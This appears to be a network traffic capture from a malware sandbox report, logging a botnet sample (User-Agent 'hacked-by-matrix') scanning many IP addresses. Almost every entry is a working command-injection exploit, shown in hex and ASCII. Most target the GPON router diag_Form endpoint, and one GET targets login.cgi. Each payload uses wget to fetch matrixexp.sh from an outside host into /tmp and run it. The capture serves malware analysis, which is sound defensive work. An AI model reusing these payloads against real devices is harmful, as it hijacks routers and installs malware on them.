                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1403192.168.2.1333642118.87.188.76443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741406918 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1404192.168.2.1335262212.41.122.110443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741416931 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1405192.168.2.13428185.187.225.24443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741450071 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1406192.168.2.1336774118.177.128.249443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741450071 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1407192.168.2.1358170109.161.75.27443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741465092 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1408192.168.2.1335148212.37.159.142443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741497993 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1409192.168.2.1352244118.139.76.14443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741503000 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1410192.168.2.1342286118.201.233.171443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741528988 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1411192.168.2.13425525.25.185.114443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741539001 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1412192.168.2.1358662118.191.223.22443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741542101 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1413192.168.2.1349580212.178.89.183443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741561890 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1414192.168.2.1351032212.164.104.59443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741605043 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1415192.168.2.133686642.239.27.60443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741611004 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1416192.168.2.1359822118.105.194.96443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741635084 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1417192.168.2.133789042.208.186.254443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741647959 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1418192.168.2.1337810118.18.63.197443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741673946 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1419192.168.2.134715642.26.198.206443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741688967 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1420192.168.2.13436785.101.206.124443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741714001 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1421192.168.2.13361525.105.137.107443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741729021 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1422192.168.2.135335445.76.198.680
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741746902 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:20.108232021 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:21.715346098 CET240OUTGET /login.cgi?cli=aa%20aa%27;wget%20http://109.205.214.35/matrixexp.sh%20-O%20-%3E%20/tmp/matrix;sh%20/tmp/matrix%27$ HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: hacked-by-matrix
                                                        Mar 21, 2024 05:23:21.977976084 CET322INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Thu, 21 Mar 2024 04:23:21 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 150
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1423192.168.2.1334404109.233.76.142443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741749048 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 62 75 73 79 62 6f 78 2b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 31 30 39 2e 32 30 35 2e 32 31 34 2e 33 35 2f 6d 61 74 72 69 78 65 78 70 2e 73 68 2b 2d 4f 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 3b 73 68 2b 2f 74 6d 70 2f 6d 61 74 72 69 78 60 26 69 70 76 3d 30
                                                        Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+wget+http://109.205.214.35/matrixexp.sh+-O+/tmp/matrix;sh+/tmp/matrix`&ipv=0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1424192.168.2.13513225.98.142.18443
                                                        TimestampBytes transferredDirectionData
                                                        Mar 21, 2024 05:23:18.741760969 CET324OUTPOST /GponForm/diag_Form?style/ HTTP/1.1
                                                        User-Agent: hacked-by-matrix
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate
                                                        Content-Type: application/x-www-form-urlencoded
